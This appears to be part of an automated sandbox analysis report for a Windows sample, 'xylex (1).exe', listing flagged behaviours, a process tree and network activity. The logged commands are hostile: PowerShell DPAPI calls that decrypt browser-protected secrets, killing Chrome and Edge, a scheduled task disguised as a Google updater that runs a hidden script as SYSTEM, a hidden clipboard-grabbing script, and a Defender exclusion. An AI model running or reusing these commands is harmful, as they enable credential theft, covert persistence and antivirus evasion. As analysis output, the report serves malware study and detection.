| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\xylex (1).exe
"C:\Users\Admin\AppData\Local\Temp\xylex (1).exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9eb3b9758,0x7ff9eb3b9768,0x7ff9eb3b9778
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4548 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3712 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4748 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t2s52bq2\t2s52bq2.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2507.tmp" "c:\Users\Admin\AppData\Local\Temp\t2s52bq2\CSCF622ED14E04E49A99BFB8C123274096.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
C:\Windows\system32\taskkill.exe
taskkill /IM chrome.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
C:\Windows\system32\taskkill.exe
taskkill /IM msedge.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,22,112,227,168,114,112,222,117,255,186,21,20,62,164,21,78,138,29,117,102,37,158,95,191,222,243,229,76,131,150,208,21,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,15,191,197,112,100,253,69,173,90,197,123,238,97,57,113,31,109,57,255,16,29,34,251,119,173,164,99,127,217,184,87,14,48,0,0,0,39,143,71,133,119,177,86,214,255,150,66,238,235,39,227,130,174,75,102,251,8,157,125,240,197,47,18,187,60,79,177,108,126,44,70,150,27,103,18,233,85,68,122,183,133,20,142,87,64,0,0,0,52,188,69,195,61,155,62,101,135,6,116,75,221,127,86,194,99,76,109,194,23,60,103,21,143,243,237,75,65,85,82,208,42,186,160,241,67,91,115,111,41,33,226,65,232,204,148,76,188,101,120,191,85,141,50,12,212,183,1,181,129,41,122,232), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,22,112,227,168,114,112,222,117,255,186,21,20,62,164,21,78,138,29,117,102,37,158,95,191,222,243,229,76,131,150,208,21,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,15,191,197,112,100,253,69,173,90,197,123,238,97,57,113,31,109,57,255,16,29,34,251,119,173,164,99,127,217,184,87,14,48,0,0,0,39,143,71,133,119,177,86,214,255,150,66,238,235,39,227,130,174,75,102,251,8,157,125,240,197,47,18,187,60,79,177,108,126,44,70,150,27,103,18,233,85,68,122,183,133,20,142,87,64,0,0,0,52,188,69,195,61,155,62,101,135,6,116,75,221,127,86,194,99,76,109,194,23,60,103,21,143,243,237,75,65,85,82,208,42,186,160,241,67,91,115,111,41,33,226,65,232,204,148,76,188,101,120,191,85,141,50,12,212,183,1,181,129,41,122,232), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fvqvcua3\fvqvcua3.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F75.tmp" "c:\Users\Admin\AppData\Local\Temp\fvqvcua3\CSCA4DC5115CC9C4B2DBC6C33A57973739F.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wininit.exe
C:\Windows\system32\wininit.exe
"C:\Windows\system32\wininit.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
Files